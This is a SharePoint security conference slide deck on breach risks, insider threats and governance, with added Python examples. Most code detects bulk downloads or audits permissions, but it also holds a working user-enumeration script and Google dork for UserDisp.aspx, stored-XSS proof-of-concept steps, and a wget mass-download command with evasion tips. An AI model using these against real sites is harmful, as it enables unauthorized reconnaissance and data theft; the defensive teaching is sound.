This document discusses why SharePoint is considered a hacker's dream. It notes that SharePoint usage has grown exponentially in recent years, with over 85 million users across 17,000 companies in 2009. SharePoint is widely used by Fortune 500 companies and contains valuable data, making it an attractive target. The document outlines some high-profile data breaches in recent years that involved SharePoint, including those by Bradley Manning and Edward Snowden. It stresses the importance of proper information security practices for SharePoint, including understanding threats, classification, and establishing governance to reduce risks and protect sensitive data.
Hacking_SharePoint_FINAL
1. SharePoint
A Hacker's Dream
Ian Naumenko, CISSP
Spot Solutions Ltd.
SharePoint Saturday Vancouver, March 11, 2016
2. Thanks to all the Sponsors!!!
Spot Solutions Ltd. SharePoint Saturday Vancouver Ian Naumenko, CISSP
3. Ian Naumenko, CISSP
WORK
✘ Director IT and Security Operations – Spot Solutions Ltd
BOARDS
✘ Vice President of InfoSecBC (Vancouver Security Special Interest Group)
✘ President Western Region IAMCP Canada (International Association of Microsoft Channel Partners)
✘ Work with POLCYB (The Society for The Policing of Cyberspace)
Education, Certifications
✘ Computer Sciences, CISSP, various Microsoft certs, ISO 90001, random others…
4. I'm not dissing SharePoint…
✘ SharePoint is an excellent collaboration platform and overall Microsoft is doing a great job making the technology secure.
✘ It's not usually the technology that is at fault, it's how we use the technology that matters…
6. Why is SharePoint a hacker's dream?
Over the past several years, the uptake of SharePoint has been considerable. Way back in 2009, it was estimated that SharePoint had licensed more than 85 million users to an estimated 17,000 companies. This number has grown exponentially in recent years, especially with Microsoft "Core CALs" (which include SharePoint) and the introduction of SharePoint Online and Office 365.
7. Why is it a hacker's dream?
"According to the Association for Information and Image Management (AIIM), one in two corporations are now using SharePoint Server and in 22% of the companies, every employee uses this popular Microsoft collaboration tool." http://www.topsharepoint.com/fortune-500-companies-using-sharepoint
8. Why is it a hacker's dream?
A vast number of Fortune 500 and private companies use SharePoint for their internal and external content, for example:
• The UPS Store
• Procter & Gamble
• SC Johnson
• Bristol-Myers Squibb
9. Why is it a hacker's dream?
...usage includes enterprise search, enterprise content management (ECM), business process management, business intelligence, records management, archiving, intranet/extranet and file sharing, right through to public-facing websites…
Contains lots of valuable data, making it a big juicy target!!!
10. Why do we care…
2015's biggest hacks and breaches
✘ Ashley Madison – 37 million "cheaters" records released
✘ VTech – 4.8 million records, including info on 200,000 kids
✘ 70 million prisoner phone records stolen (attorney-client privilege may have been violated)
✘ FBI's portal breached, thousands of arrestees' data at risk, including access to CIA director John Brennan's private email account (the widest external breach of law enforcement this year)
✘ Donald Trump's hotel chain hack hit thousands of hotel visitors (credit card data including security codes and card numbers)
✘ Crowdfunding service Patreon hack led to 15 GB data dump
✘ Experian breach hit 15 million T-Mobile customers
✘ Scottrade hack: details on 4.6 million customers stolen
✘ Excellus BlueCross BlueShield – 10 million records
11. Why do we care…
2015's biggest hacks and breaches
✘ Carphone Warehouse tops UK breach list with 2.4 million affected
✘ CVS, Walgreens credit card breach: millions of CC, email, postal code etc. records leaked
✘ UCLA Health failed to encrypt 4.5 million records
✘ Hacking Team exploits put hundreds of millions of Flash users at risk
✘ OPM breach, which affected 22.1 million US government workers (and counting)
✘ LastPass customers at risk after millions of passwords accessed
✘ The IRS data breach: stolen tax returns of over 100,000 taxpayers
✘ Anthem (US healthcare provider) breach affected one-third of Americans
The annual cost of data breaches in the US is estimated to be $100 billion
12. Why do we care… Bradley Manning
Forensics discovered wget scripts on Manning's computer that pointed to a Microsoft SharePoint server holding the Gitmo documents. He ran the scripts to download the documents…
Edward Snowden
NSA General Keith Alexander indicated…
"This leaker was a system administrator who was trusted with moving the information to actually make sure that the right information was on the SharePoint servers that NSA Hawaii needed." He then added that the leak was "... a huge break in trust and confidence. So there are issues we have got to fix there."
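A scripted wget loop of the kind found on Manning's machine leaves an obvious trail in the IIS logs of the SharePoint web front end, and the Snowden case is the reminder that a trusted administrator's access deserves the same watching. The following Python script is an added example, not code from the original slides: it parses IIS W3C log lines (it reads the column names from the #Fields header, and assumes the date, time, cs-method, cs-uri-stem, cs-username, c-ip, cs(User-Agent) and sc-status fields are enabled), counts successful document downloads per user in a sliding ten-minute window, and flags any user who exceeds a threshold or whose client identifies itself as a download tool. The log content, user names, paths and the threshold of 50 are all constructed assumptions.

```python
"""Flag scripted bulk downloads of SharePoint documents in IIS W3C logs.

Added example, not from the original slides. Field names are taken from the
#Fields line; the log content below is constructed, not real data.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Document types worth counting; listing pages, scripts and images are ignored.
DOC_EXT = (".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".zip")
# User-Agent fragments typical of download tools rather than browsers.
SCRIPTED_UA = re.compile(r"wget|curl|python|powershell|libwww|httpclient", re.I)
THRESHOLD = 50                  # document downloads per user per window (assumed)
WINDOW = timedelta(minutes=10)

FIELDS_LINE = ("#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query "
               "s-port cs-username c-ip cs(User-Agent) sc-status")
BROWSER_UA = "Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:44.0)+Gecko/20100101+Firefox/44.0"


def _entry(ts, user, ip, stem, ua, status="200"):
    """One W3C log line; IIS writes spaces inside the User-Agent as '+'."""
    return f"{ts:%Y-%m-%d %H:%M:%S} 10.0.0.5 GET {stem} - 443 {user} {ip} {ua} {status}"


def build_sample_log():
    """Constructed log: one normal user and one wget loop at 02:00."""
    lines = ["#Software: Microsoft Internet Information Services 8.5", FIELDS_LINE]
    t0 = datetime(2016, 3, 11, 9, 0, 0)
    for i, name in enumerate(["plan.docx", "budget.xlsx", "minutes.pdf"]):
        lines.append(_entry(t0 + timedelta(minutes=20 * i), "CORP\\alice", "10.0.1.20",
                            f"/sites/ops/Shared%20Documents/{name}", BROWSER_UA))
    t1 = datetime(2016, 3, 11, 2, 0, 0)
    for i in range(120):      # 120 files in four minutes, outside office hours
        lines.append(_entry(t1 + timedelta(seconds=2 * i), "CORP\\bob", "10.0.1.77",
                            f"/sites/ops/Shared%20Documents/report-{i:03d}.pdf",
                            "Wget/1.16+(linux-gnu)"))
    return "\n".join(lines)


def parse_iis(text):
    """Yield one dict per request, keyed by the names in the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            parts = line.split(" ")
            if len(parts) == len(fields):       # skip malformed lines
                yield dict(zip(fields, parts))


def is_document_download(rec):
    """Only successful GETs of document types count towards the rate."""
    return (rec["cs-method"] == "GET" and rec["sc-status"] == "200"
            and rec["cs-uri-stem"].lower().endswith(DOC_EXT))


def find_bulk_downloads(text, threshold=THRESHOLD, window=WINDOW):
    """Return {user: finding} for users who exceed the sliding-window rate or
    use a scripted client. A per-user deque holds the timestamps in the window."""
    recent = defaultdict(deque)
    findings = {}
    for rec in parse_iis(text):
        if not is_document_download(rec):
            continue
        user = rec["cs-username"]
        ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        q = recent[user]
        q.append(ts)
        while ts - q[0] > window:               # drop downloads older than the window
            q.popleft()
        scripted = bool(SCRIPTED_UA.search(rec["cs(User-Agent)"]))
        if len(q) >= threshold or scripted:
            f = findings.setdefault(user, {"max_in_window": 0, "scripted_agent": False,
                                           "client_ips": set(), "first_seen": ts})
            f["max_in_window"] = max(f["max_in_window"], len(q))
            f["scripted_agent"] = f["scripted_agent"] or scripted
            f["client_ips"].add(rec["c-ip"])
    return findings


if __name__ == "__main__":
    for user, f in find_bulk_downloads(build_sample_log()).items():
        print(user, f["max_in_window"], f["scripted_agent"], sorted(f["client_ips"]))
```

The User-Agent check is weak evidence on its own, since any client can claim to be a browser; the rate rule is the one to tune against a baseline of normal use, and on a real farm the findings should be shipped to the SIEM rather than read from the console.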
13. So, what do we need to do…
To start…
1. We need to understand what Information Security really is all about…
2. We need to understand external and internal threats…
15. Security is not a group in SharePoint…
“To many in the SharePoint world, “SharePoint
security” is synonymous with “SharePoint
permissions” and the Snowden breach is a
great example of how permissions are a single
point of failure but do not (in and of themselves)
equate to a proper security architecture.”
http://www.nothingbutsharepoint.com/2013/08/30/sharepoint-security-impacts-from-snowden-and-wikileaks-breaches-aspx/
16. Need to understand the CIA…
19. Confidentiality, Integrity and Availability
Confidentiality - Confidentiality refers to limiting information access and disclosure to authorized users -- "the right people" -- and preventing access by or disclosure to unauthorized ones -- "the wrong people."
(Think authentication, permissions and groups in SharePoint: who gets to see what…)
Integrity - Integrity refers to the trustworthiness of information resources. It includes the concept of "data integrity" -- namely, that data have not been changed inappropriately, whether by accident or by deliberately malign activity. It also includes "origin" or "source integrity" -- that is, that the data actually came from the person or entity you think it did, rather than an impostor.
(Think SharePoint's "Created by" or "Last modified" each time a document is uploaded/changed; note that these are ordinary metadata fields an administrator can alter, so tamper evidence really rests on version history and the audit log)
Availability - Availability refers, unsurprisingly, to the availability of information resources. An information system that is not available when you need it is almost as bad as none at all. It may be much worse, depending on how reliant the organization has become on a functioning computer and communications infrastructure.
(Think disaster recovery, high availability)
20. Information Classification…
Classifying data is the process of categorizing data assets based on nominal values according to
its sensitivity (e.g., impact of applicable laws and regulations).
An example of a Data Classification:
Public - Information that may or must be open to the general public.
Internal - Information that must be guarded due to proprietary, ethical, or privacy
considerations.
Confidential - Highly sensitive data intended for limited, specific use by a workgroup,
department, or group of individuals with a legitimate need-to-know.
Regulatory Data Classification - Information that’s protected by statutes and regulations, and
governed by a regulatory body or council regarding the investigation, response, reporting and
handling of incidents.
21. Understand the B's and the C's
Business
✘ Technology and security are there to support the business, not the other way around
✘ Difference between a manufacturer and a healthcare provider
✘ Government has different drivers since its goal is to protect the public
✘ Understand the actual business need
✘ Add business value
Culture
✘ Heads down, don't rock the boat
✘ Where's my bonus?
Assets
✘ Are we spending a loonie to save a dime?
✘ What is our risk appetite?
✘ Risk avoidance, reduction, transfer, acceptance
✘ Risk = Likelihood x Impact
(Diagram: Business, Security, Technology)
22. Security basics: definitions of threat, attack and risk
Definition of threat: an object, person, or other entity that represents a constant danger to an asset.
Definition of vulnerability: a weakness that makes targets susceptible to an attack.
Definition of attack: an action taken against a target with the intention of doing harm.
Definition of risk: the likelihood of being targeted by a given attack, of an attack being successful, and general exposure to a given threat.
Source: excerpt from CISSP Guide to Security Essentials, chapter 10
25. Internal Threats… "Most data security threats are internal"
Internal vulnerabilities in some form or another are responsible for a total of 70 percent of breaches (Forrester)
✘ Employees (the ones you always do trust, but shouldn't)
✘ Developers (no-one trusts these guys)
✘ Administrators (all powerful)
26. Internal threats…
✘ Lost or stolen devices account for 31 percent of all data security breaches
✘ Accidental misuse by an employee accounted for another 27 percent of incidents
✘ 12 percent of breaches were caused by malicious insiders
✘ 22 percent of incidents involved either customer or employee data. In addition to reputational damage…
✘ 19 percent of breaches involved intellectual property
http://blog.trendmicro.com/most-data-security-threats-are-internal-forrester-says/
27. Pieces of a puzzle…
Hackers don't wave a magic wand and voilà, they're in. If organized, information is gathered over time from multiple sources and techniques, then slowly assembled like a puzzle.
• BotNets
• Hacking
• Malware
• Pharming
• Phishing
• Ransomware
• Spam
• Spoofing
• Spyware
• Trojan Horses
• Viruses
• Worms
• WiFi eavesdropping
• Email scams
• Phishing and Smishing scams
• Contests and scams
• Online dating scams
• Social network scams
• Fraudulent calls
• Social engineering
29. SharePoint can be vulnerable if we are not careful
✘ Don't assume that just because you have some SharePoint permissions set up that your data is “automatically” safe; this applies on premises, to hosted solutions and to Office 365
✘ We need to start treating SharePoint as a business-critical repository of important, sensitive business information
✘ “Security is not just a checklist, it's a strategy”
✘ Threats are not just external…
✘ SharePoint security only stands a chance if there is governance
30. Governance is the key
✘ “Governance for SharePoint could be defined as your strategy for delivering the business
solutions your end users want, within the scope of the technology and security considerations, while
maintaining those business constraints.”
✘ Reducing risk – “just over 43 percent claimed they do not regularly run audits on usage, security,
content or permissions, which is frightening to say the least. A governance plan that protects business
IP and is aligned with the appropriate compliance regulations helps reduce potentially devastating risk
and losses in the future.“
✘ “Governance actually enables business agility and protects the business from data leaks, risk and
lost resources”
Great free resource; all of the quotes above are from the Metalogix ebook “SharePoint Governance Best Practices” by SharePoint MVP Christian Buckley
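One way to act on the audit point above (the 43 percent who never review usage, security, content or permissions): a small permissions review over an exported list of role assignments. This is an added example, not code from the deck or the Metalogix ebook. The CSV column layout, the site URLs under intranet.example and the severity rules are assumptions about whatever reporting tool produced the export; the broad principals are SharePoint's own display names for everyone-type grants.

```python
"""Review a SharePoint permissions export for the grants a governance audit
should question. Added example, not from the deck or the Metalogix ebook.
The CSV layout (one row per role assignment, columns as below) is an
assumption about whatever reporting tool produced the export; the severity
rules are a starting point to tune to your own classification scheme."""
import csv
import io
from typing import Dict, List

BROAD_PRINCIPALS = {
    "everyone", "everyone except external users",
    "nt authority\\authenticated users", "all authenticated users",
}
# Default permission levels, least to most capable; unknown custom levels
# are treated as strong so that they surface for review.
LEVEL_RANK = ["limited access", "view only", "read", "contribute",
              "edit", "design", "full control"]
SEVERITY_ORDER = ("HIGH", "MEDIUM", "LOW")

# Constructed export for offline use (assumed column names).
EXPORT_CSV = """\
scope,object,principal,principal_type,permission_level,unique_permissions
https://intranet.example/sites/finance,Web,Finance Owners,SharePoint Group,Full Control,True
https://intranet.example/sites/finance,Web,Finance Members,SharePoint Group,Edit,True
https://intranet.example/sites/finance,Web,Everyone,Security Group,Read,True
https://intranet.example/sites/finance/Shared Documents,List,Everyone,Security Group,Contribute,True
https://intranet.example/sites/finance/Shared Documents/Budget.xlsx,Item,CONTOSO\\jdoe,User,Full Control,True
https://intranet.example/sites/hr,Web,HR Owners,SharePoint Group,Full Control,True
https://intranet.example/sites/hr,Web,NT AUTHORITY\\Authenticated Users,Security Group,Read,True
"""


def parse_export(text: str) -> List[Dict[str, str]]:
    """One dict per role assignment row."""
    return list(csv.DictReader(io.StringIO(text)))


def level_rank(level: str) -> int:
    level = level.lower()
    return LEVEL_RANK.index(level) if level in LEVEL_RANK else len(LEVEL_RANK)


def audit(rows: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return findings sorted HIGH > MEDIUM > LOW, each naming scope and principal."""
    findings: List[Dict[str, str]] = []

    def add(severity: str, row: Dict[str, str], reason: str) -> None:
        findings.append({"severity": severity, "scope": row["scope"],
                         "principal": row["principal"], "reason": reason})

    for row in rows:
        principal = row["principal"].lower()
        rank = level_rank(row["permission_level"])
        if principal in BROAD_PRINCIPALS:
            if rank > level_rank("read"):
                add("HIGH", row, "everyone-type principal can change content")
            else:
                add("MEDIUM", row, "everyone-type principal can read; confirm the content is classified for all staff")
        if row["principal_type"] == "User" and rank == level_rank("full control"):
            add("MEDIUM", row, "Full Control granted directly to a user; grant it through an owners group instead")
        if row["object"] == "Item" and row["unique_permissions"] == "True":
            add("LOW", row, "item-level unique permissions are easy to lose track of; prefer library or folder scope")
    findings.sort(key=lambda f: SEVERITY_ORDER.index(f["severity"]))
    return findings


if __name__ == "__main__":
    for f in audit(parse_export(EXPORT_CSV)):
        print(f["severity"], f["scope"], f["principal"], f["reason"], sep=" | ")
```

Against the constructed export this flags the Contribute grant to Everyone on the finance document library as HIGH, the two everyone-type Read grants and the direct Full Control to a user as MEDIUM, and the item-level permission on the budget file as LOW. Feed it a real export on a schedule and the "do we audit permissions?" question answers itself.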
32. On-premises deployments…
✘ Pros
• All corporate data is kept onsite, in-house
• Data sovereignty (i.e. keeping content within the country)
• More ability for customization (farm solutions); no need to rely on JavaScript alone
• Knowing your sysadmin team and those who have the keys to your kingdom
• CIA: confidentiality and integrity
✘ Cons
• Few or no internal “security-minded” resources available
• Limited or over-stretched sysadmin resources
• More upkeep and maintenance costs for infrastructure
• Developers of farm solutions (full-trust code) need to follow a secure SDLC (SSDLC) and understand the potential impact of custom code
• CIA: availability
33. Cloud deployments…
✘ Pros
• Little or no internal infrastructure
• Vast Microsoft infrastructure and security resources
• Automated backup
• Scalability
• CIA: availability
✘ Cons
• If the internet is down or inaccessible, so is your data
• All data is reachable from outside the corporate network
• Data is stored wherever Microsoft decides
• Data sovereignty: even if it sits in a Canadian data center, operations are run by a company subject to a foreign jurisdiction
• Adequately securing against rogue systems administrators and insiders…
• CIA: confidentiality, availability
36. Three click attack…
SharePoint Hacking Diggity Project – Bishop Fox
http://www.bishopfox.com/resources/tools/sharepoint-hacking-diggity/attack-tools/
✘ UserDispEnum
• UserDispEnum is a SharePoint user enumeration tool that exploits insecure access controls to the
/_layouts/UserDisp.aspx?ID=1 page. This utility cycles through the integer ID values from 1 onward to identify
valid users, account names, and other related profile information that can easily be extracted from the SharePoint
user profiles.
Paste this into your browser: http://www.google.com/#q=inurl:"/_layouts/userdisp.aspx"
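What UserDispEnum does, as an added example written for this page rather than Bishop Fox's tool: walk the ID values, keep going across the gaps left by deleted accounts, and pull the profile fields out of each page that renders. The HTTP layer is a pluggable fetch(url) callable, so the logic runs offline against the constructed site below; the ms-formlabel/ms-formbody cells, the "User cannot be found" miss text and the intranet.example host are assumptions about the classic form rendering. profile_page_exposed is the check to run on your own farm: if an unauthenticated fetch of ID=1 returns a profile, the page is open to anyone, which is exactly what the Google search above turns up.

```python
"""Enumerate SharePoint users by walking /_layouts/UserDisp.aspx?ID=<n>.

Added example, not Bishop Fox's UserDispEnum. The HTTP layer is a pluggable
fetch(url) -> (status, body) callable, so the same logic runs offline against
the constructed responses below. The markup matched here (ms-formlabel /
ms-formbody cells) and the "User cannot be found" miss text are assumptions
about the classic SharePoint form rendering; adjust them to what your farm
actually returns.
"""
import re
from typing import Callable, Dict, List, Optional, Tuple

Fetcher = Callable[[str], Tuple[int, str]]

MISS_MARKER = "User cannot be found"          # assumed text for a non-existent ID
_ROW = re.compile(
    r'<td[^>]*class="ms-formlabel"[^>]*>(?P<label>.*?)</td>\s*'
    r'<td[^>]*class="ms-formbody"[^>]*>(?P<value>.*?)</td>',
    re.S | re.I,
)
_TAGS = re.compile(r"<[^>]+>")


def parse_profile(body: str) -> Optional[Dict[str, str]]:
    """Return {field label: value} for a rendered profile page, None for a miss."""
    if MISS_MARKER in body:
        return None
    fields = {
        _TAGS.sub("", m["label"]).strip(): _TAGS.sub("", m["value"]).strip()
        for m in _ROW.finditer(body)
    }
    return fields or None


def enumerate_users(base_url: str, fetch: Fetcher, start: int = 1,
                    max_gap: int = 5, limit: int = 10000) -> List[Dict[str, str]]:
    """Walk IDs from `start`. Deleted users leave holes in the ID sequence, so
    stop only after `max_gap` consecutive misses rather than at the first one."""
    found: List[Dict[str, str]] = []
    misses = 0
    for uid in range(start, start + limit):
        status, body = fetch(f"{base_url}/_layouts/UserDisp.aspx?ID={uid}")
        profile = parse_profile(body) if status == 200 else None
        if profile is None:
            misses += 1
            if misses >= max_gap:
                break
            continue
        misses = 0
        profile["ID"] = str(uid)
        found.append(profile)
    return found


def profile_page_exposed(base_url: str, anonymous_fetch: Fetcher) -> bool:
    """The check to run on your own site: does an unauthenticated client get a
    profile back for ID=1 instead of a login prompt or an access-denied page?"""
    status, body = anonymous_fetch(f"{base_url}/_layouts/UserDisp.aspx?ID=1")
    return status == 200 and parse_profile(body) is not None


def constructed_site(users: Dict[int, Dict[str, str]], require_auth: bool = False) -> Fetcher:
    """Offline stand-in for a SharePoint site holding the given user IDs
    (constructed markup approximating the classic display form)."""
    def fetch(url: str) -> Tuple[int, str]:
        if require_auth:
            return 401, ""
        m = re.search(r"ID=(\d+)", url)
        uid = int(m.group(1)) if m else -1
        if uid not in users:
            return 200, "<html><body><span>User cannot be found.</span></body></html>"
        rows = "".join(
            f'<tr><td class="ms-formlabel"><h3>{k}</h3></td>'
            f'<td class="ms-formbody">{v}</td></tr>'
            for k, v in users[uid].items()
        )
        return 200, f"<html><body><table>{rows}</table></body></html>"
    return fetch


# Constructed sample directory; IDs 3-6 are the holes left by removed accounts.
SAMPLE_USERS = {
    1: {"Name": "Ian Naumenko", "Account": "CONTOSO\\inaumenko", "Work e-mail": "ian@contoso.example"},
    2: {"Name": "Jane Doe", "Account": "CONTOSO\\jdoe", "Work e-mail": "jdoe@contoso.example"},
    7: {"Name": "Sam Smith", "Account": "CONTOSO\\ssmith", "Work e-mail": "ssmith@contoso.example"},
}

if __name__ == "__main__":
    site = constructed_site(SAMPLE_USERS)
    for u in enumerate_users("https://intranet.example", site):
        print(u["ID"], u["Account"], u["Work e-mail"])
    print("exposed to anonymous:", profile_page_exposed("https://intranet.example", site))
```

To point it at a site you are authorised to test, pass a fetch callable that performs the real request with whatever authentication the site uses (NTLM on premises, a session cookie for Office 365); the enumeration and the exposure check do not change. Only test against sites you are authorised to assess.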
42. Also many technical vulnerabilities…
✘ Microsoft Security Bulletin MS15-036 - Elevation of Privilege
• April 14, 2015: - The attacker who successfully exploited these vulnerabilities could then perform cross-site
scripting attacks on affected systems and run script in the security context of the current user. These attacks
could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take
actions on the SharePoint site on behalf of the victim, such as change permissions and delete content, and inject
malicious content in the victim’s browser.
✘ Microsoft SharePoint Online (cloud) - filter bypass & persistent vulnerability
• Aug 18, 2015: - It is possible to evade the current security controls on Microsoft SharePoint Online 2013 Web
Application by simply adding a blank iframe in the HTML through the "embed code" feature. It does not matter what
policies have been implemented through the "HTML Field Security" feature. All filters / policies are easily evaded
using the above mentioned filter bypass technique and this should be fixed immediately. Please note, once the
filter is evaded, it is possible to inject malicious script code without any restrictions and it doesn't get stripped /
filtered even after publishing. Successful exploitation of the vulnerability results in filter evasion of all SharePoint
security policies for the websites and allows execution of persistent script code that can result in session
hijacking, persistent phishing, stable external redirect, stable external malware loads and persistent vulnerable
module context manipulation.
43. Microsoft SharePoint Online (cloud) - filter bypass & persistent vulnerability
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low required user
interaction and a (restricted) privileged SharePoint cloud application user account. For security demonstration or to
reproduce the vulnerability follow the provided information and steps below.
1. Register an Office and SharePoint Online 2013 account
2. Log in to the SharePoint portal as admin
3. Go to your site and click on Edit
4. Go to Insert and include "embed code"
5. In the input box, enter the given "Payload"
6. Click Insert and then Save
7. Upon being redirected to the index page, a JavaScript box should pop up, proving the existence of this vulnerability
http://www.vulnerability-lab.com/get_content.php?id=1024
44. WGET script
✘ What is WGET?
• It's a command-line tool to download web pages and their assets
✘ Why does it matter…
• Mass content download!
The following command will download all the content from SharePoint to static pages using WGET. WGET even
fixes all links so that most navigation still works.
wget -r --no-parent --convert-links -P C:\temp\<my local folder> --http-user=<domain\username> --http-password=<password> http://<path to sharepoint>
(--http-password is spelled --http-passwd in older wget versions)
✘ What can we do to prevent its use…
• WGET respects passwords: it only gets what the supplied account can already read, so least-privilege permissions limit the damage
• wget respects, by default, your robots.txt file (but -e robots=off turns that off)
• Web servers can be set up to deny WGET's default user agent (but --user-agent lets the caller send any string)
• All that being said, it's really hard to block
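A detection to back the points above, added here as an example and not part of the deck: run the IIS W3C logs from the SharePoint web front end through two checks, wget's default User-Agent (cheap, and beaten by --user-agent) and one account fetching many distinct documents inside a short window (which survives the spoofed agent and -e robots=off). The log lines, account names, IP addresses and thresholds are constructed for the example; spaces inside the User-Agent are written as '+', as IIS does.

```python
"""Spot mass content download in IIS logs from a SharePoint web front end.

Added example, not from the original deck. Two signals: wget's default
User-Agent (trivial to spoof with --user-agent, so it catches only the
careless) and, more robustly, one account fetching many distinct documents
inside a short window, which survives any User-Agent or robots.txt trick.
The log lines below are constructed in the default IIS W3C format; the
window and threshold are assumptions to tune against your own baseline.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, Iterable, Iterator, List, Tuple

TOOL_AGENTS = ("wget/", "curl/", "python-requests/")   # default UAs of bulk tools
DOC_EXT = (".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf")


def parse_iis(lines: Iterable[str]) -> Iterator[Dict[str, str]]:
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields: List[str] = []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            yield dict(zip(fields, line.split()))


def find_mass_downloads(records: Iterable[Dict[str, str]],
                        window: timedelta = timedelta(seconds=60),
                        threshold: int = 20) -> Dict[str, List[str]]:
    """Return {account: sorted reasons} for accounts worth a closer look."""
    reasons: Dict[str, set] = defaultdict(set)
    recent: Dict[str, Deque[Tuple[datetime, str]]] = defaultdict(deque)
    for r in records:
        user = r["cs-username"]
        ts = datetime.strptime(f'{r["date"]} {r["time"]}', "%Y-%m-%d %H:%M:%S")
        if r["cs(User-Agent)"].lower().startswith(TOOL_AGENTS):
            reasons[user].add("tool-user-agent")
        stem = r["cs-uri-stem"].lower()
        if r["cs-method"] == "GET" and r["sc-status"] == "200" and stem.endswith(DOC_EXT):
            q = recent[user]
            q.append((ts, stem))
            while q and ts - q[0][0] > window:        # slide the window forward
                q.popleft()
            if len({s for _, s in q}) >= threshold:   # distinct documents only
                reasons[user].add("mass-download")
    return {u: sorted(v) for u, v in reasons.items()}


def _entry(sec: int, user: str, ip: str, stem: str, ua: str) -> str:
    """One constructed W3C log line (status 200, 15 ms)."""
    return f"2015-09-12 09:00:{sec:02d} 10.0.0.5 GET {stem} - 80 {user} {ip} {ua} - 200 0 0 15"


_BROWSER = "Mozilla/5.0+(Windows+NT+6.1;+WOW64;+Trident/7.0)"
SAMPLE_LOG = [
    "#Software: Microsoft Internet Information Services 8.5",
    "#Version: 1.0",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port "
    "cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken",
    # jdoe pulls 25 distinct documents in 25 seconds behind a browser User-Agent
    *[_entry(i, "CONTOSO\\jdoe", "10.0.1.20",
             f"/sites/finance/Shared%20Documents/report{i}.docx", _BROWSER) for i in range(25)],
    # asmith fetches two files with wget's default User-Agent
    _entry(30, "CONTOSO\\asmith", "10.0.1.21", "/sites/hr/Policies/Handbook.pdf", "Wget/1.16+(linux-gnu)"),
    _entry(31, "CONTOSO\\asmith", "10.0.1.21", "/sites/hr/Policies/Onboarding.docx", "Wget/1.16+(linux-gnu)"),
    # bjones browses normally
    _entry(40, "CONTOSO\\bjones", "10.0.1.22", "/sites/finance/SitePages/Home.aspx", _BROWSER),
    _entry(45, "CONTOSO\\bjones", "10.0.1.22", "/sites/finance/Shared%20Documents/Budget.xlsx", _BROWSER),
]

if __name__ == "__main__":
    for account, why in find_mass_downloads(parse_iis(SAMPLE_LOG)).items():
        print(account, why)
```

On the constructed log the spoofed-agent account is caught by the rate check alone and the careless wget user by the agent check alone, which is the point: the user-agent rule is worth having, but the volume rule is what still fires after someone reads the wget manual. On a real front end run find_mass_downloads(parse_iis(open(path))) over each day's log, and treat the threshold as something to derive from normal usage rather than guess.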
45. What can we do?
46. Vulnerability assessment tools and resources…
✘ Assessment tools from vendors such as
Metalogix – free Insider Threat Vulnerability tool
ShareGate – SharePoint Security Tool
AvePoint – DocAve Governance Automation
✘ OWASP Top 10
✘ Kali Linux disc (pen testing)
✘ Microsoft Security TechCenter – security bulletins
https://technet.microsoft.com/en-us/library/security/dn631937.aspx
✘ Common Vulnerabilities and Exposures (CVE) database
http://www.cve.mitre.org/find/index.html
47. Points to remember…
✘ SharePoint doesn't matter, the business matters. (quoted from the Metalogix Governance Best Practices ebook)
✘ We have to approach cloud services by assuming that your data is being looked at
by third parties, including cloud systems administrators, and by governmental
agencies…
✘ Most IT platforms, and particularly collaboration-oriented platforms, are challenged
to adequately secure against rogue systems administrators and insiders. The
solution to securing SharePoint and other IT platforms against insiders will always
boil down to careful application of security controls, which are not always
technical…
http://www.nothingbutsharepoint.com/2013/08/30/sharepoint-security-impacts-from-snowden-and-wikileaks-breaches-aspx/
48. Points to remember… (cont…)
✘ Don't take the technology for granted.
✘ Governance is most important. “It's not a checklist, it's a strategy”
✘ Educate staff in simple language they can understand and relate to
✘ Don't fall into “tick-box security”
✘ Understand the business needs and culture
✘ Be careful with custom code. Always use SSDLC techniques
✘ Teach your staff about social engineering
✘ Deploy defense-in-depth protection
49. Conclusion…
Mike Fleck, Co-Founder of CipherPoint Software, wrote:
“If your house gets broken into, but you like the house, keep the house and buy a security system. People love SharePoint for the collaboration efficiencies the platform brings to the enterprise. Add to SharePoint the right set of administrative and technical security controls, and you've got a winning combination. It is possible to use the SharePoint platform for use cases involving highly sensitive data!”
50. thanks!
Any questions?
You can find me at
ian@spotsolutions.com
https://www.linkedin.com/in/iannaumenko
@ignhot
Credits
Special thanks to all the people who made and released these awesome slides for free:
Presentation template by SlidesCarnival
Photographs by Unsplash
Editor's Notes
We as administrators of business, and of the technology that supports business, need to be concerned…
Seen SP sites locked down to the point that they can't be used
Story about reading clients' emails
/_layouts/settings.aspx
Interoperability (pronounced IHN-tuhr-AHP-uhr-uh-BIHL-ih-tee) is a property of a product or system, whose interfaces are completely understood, to work with other products or systems, present or future, without any restricted access or implementation
Some SP installations are not usable because there is too much security